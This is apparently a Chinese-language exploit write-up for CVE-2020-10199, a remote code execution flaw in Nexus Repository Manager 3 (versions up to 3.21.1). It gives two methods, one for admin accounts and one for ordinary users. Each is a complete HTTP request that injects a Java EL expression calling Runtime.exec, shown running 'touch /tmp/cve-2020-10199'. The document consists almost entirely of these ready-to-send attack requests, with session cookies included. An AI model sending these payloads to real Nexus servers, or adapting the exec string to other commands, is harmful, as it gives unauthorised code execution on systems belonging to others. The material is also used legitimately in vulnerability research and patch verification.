CVE-2020-10199 Nexus Repository Manager 3 RCE

## CVE-2020-10199 Nexus Repository Manager 3 RCE

**影响版本**：

– <= 3.21.1 Affected Versions: All previous Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1 - Fixed in Version: Nexus Repository Manager OSS/Pro version 3.21.2 **前提:** 登陆任何一个账号 **>> 调用接口**

– 方法1 （需要管理员权限）

1. 创建 `CleanupPolicy`：

“`http
POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 381
Pragma: no-cache
Cache-Control: no-cache
Sec-Fetch-Dest: empty
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.047908797369389244
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
Connection: close

{“action”:”cleanup_CleanupPolicy”,”method”:”create”,”data”:[{“name”:”threedr3am”,”format”:”$\\A{”.getClass().forName(‘java.lang.Runtime’).getMethods()[6].invoke(null).exec(‘touch /tmp/cve-2020-10199’)}”,”notes”:”222″,”mode”:”delete”,”lastBlobUpdatedEnabled”:false,”lastDownloadedEnabled”:false,”releaseTypeEnabled”:false,”regexEnabled”:false,”criteria”:{}}],”type”:”rpc”,”tid”:33}
“`

2. 创建 `repositories`：

“`http
POST /service/rest/beta/repositories/apt/hosted HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 342
Pragma: no-cache
Cache-Control: no-cache
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.047908797369389244
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
Connection: close

{
“name”: “interna1l”,
“online”: true,
“storage”: {
“blobStoreName”: “default”,
“strictContentTypeValidation”: true,
“writePolicy”: “allow_once”
},
“cleanup”: {
“policyNames”: [“threedr3am”]
},
“apt”: {
“distribution”: “bionic”
},
“aptSigning”: {
“keypair”: “string”,
“passphrase”: “string”
}
}
“`

– 方法2 （普通用户权限）

“`http
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 195
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=396e7352-f76c-4bdd-9833-98d7990dca3b
Connection: close

{
“name”: “internal”,
“online”: true,
“storage”: {
“blobStoreName”: “default”,
“strictContentTypeValidation”: true
},
“group”: {
“memberNames”: [“$\\A{”.getClass().forName(‘java.lang.Runtime’).getMethods()[6].invoke(null).exec(‘touch /tmp/cve-2020-10199’)}”]
}
}
“`

> [@threedr3am](https://github.com/threedr3am/learnjavabug/tree/master/nexus/CVE-2020-10199)